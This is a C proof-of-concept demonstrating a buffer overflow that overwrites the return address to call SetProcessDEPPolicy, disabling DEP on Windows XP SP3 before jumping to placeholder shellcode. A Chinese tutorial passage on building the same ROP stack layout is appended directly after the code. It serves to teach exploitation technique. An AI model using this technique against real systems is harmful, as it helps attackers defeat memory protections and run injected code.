- /*
- This is a proof of concept of buffer overflow exploitation with DEP
- bypass on Windows XP Professional SP3 english updated on December 9,
- 2009 with DEP manually set to OptOut so enabled for all processes,
- except the ones that are put in the exception list and this program
- is not.
- This source has been compiled with Microsoft Visual C++ 2008 Express
- Edition in Release mode with the default flags. This includes
- /NXCOMPAT and /GS.
- Buffer Security Check (stack cookie, /GS flag) does not need to be
- bypassed because the string buffer, buf, in this example is long
- 4 bytes, so the compiler does not add the GS cookie to the
- useSetProcessDEPPolicy() function. Remember that strict_gs_check
- pragma by default is turned off.
- References:
- * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
- Server 2008' by Michael Howard,
- http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
- * SetProcessDEPPolicy Function,
- http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx
- Feel free to write me for comments and questions,
- Bernardo Damele A. G. <bernardo.damele@gmail.com>
- */
- #include <windows.h>
- #include <stdlib.h>
- void useSetProcessDEPPolicy ( )
- {
- char buf [4 ] ;
- /* Overflow the string buffer and EBP register. */
- strcpy (buf , "AAAABBBB" ) ;
- /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
- Windows XP SP3 and Windows Server 2008 and can be abused by an
- attacker while exploiting a buffer overflow vulnerability to disable
- hardware-enforced DEP (NX/XD bit) for the running process.
- Overwrite EIP with the address of SetProcessDepPolicy() API, which
- is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
- December 9, 2009.
- NOTE: You might need to adapt it depending on your system patch
- level. */
- memcpy (buf + 8 , "\xa4\x22\x86\x7c" , 4 ) ;
- /* Return address of SetProcessDepPolicy().
- Use an address of a JMP ESP instruction in kernel32.dll to jump to our
- shellcode on the top of the stack.
- NOTE: You might need to adapt it depending on your system patch
- level. */
- memcpy (buf + 12 , "\x13\x44\x87\x7c" , 4 ) ;
- /* Argument for SetProcessDepPolicy().
- 0x00000000 turn off DEP for this process. */
- memcpy (buf + 16 , "\x00\x00\x00\x00" , 4 ) ;
- /* The shellcode to be executed after DEP has been disabled.
- For instance, a breakpoint (INT 3 instruction) to call the
- debug exception handler which will pause the process. */
- memcpy (buf + 20 , "\xcc" , 1 ) ;
- }
- int main ( )
- {
- useSetProcessDEPPolicy ( ) ;
- return 0 ;
- }利用SetProcessDEPPolicy来关闭DEP 适用在:Windows XP SP3,Vista SP1 和Windows 2008。 为了能使这个函数有效,当前的DEP 策略必须设成OptIn 或者OptOut。如果策略被设成 AlwaysOn(或者AlwaysOff),然后SetProcessDEPPolicy 将会抛出一个错误。如果一个模块 是以/NXCOMPAT 链接的,这个技术也将不会成功。最后,同等重要的是,它这能被进程调 用一次。因此如果这个函数已经被当前进程调用(如IE8,当程序开始时已经调用它),它 将不成功。 Bernardo Damele 写了一篇关于这一技术的博文: http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html 函数原型如下: BOOLWINAPI SetprocessDEPPolicy( __in DWORD dwFlags ); 这个函数需要一个参数,并且这个参数必须设置为0,以此禁用当前进程的DEP。 为了在ROP 链中使用这个函数,你需要在栈上这样设置: ●指向SetProcessDEPPolicy 的指针 ●指向shellcode 的指针 ●0 指向shellcode 的指针用于确保当SetProcessDEPPolicy()执行完ROP链后会跳到shellcode。 在XP SP3 下SetProcessDEPPolicy 的地址是7C8622A4(kernel32.dll)http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html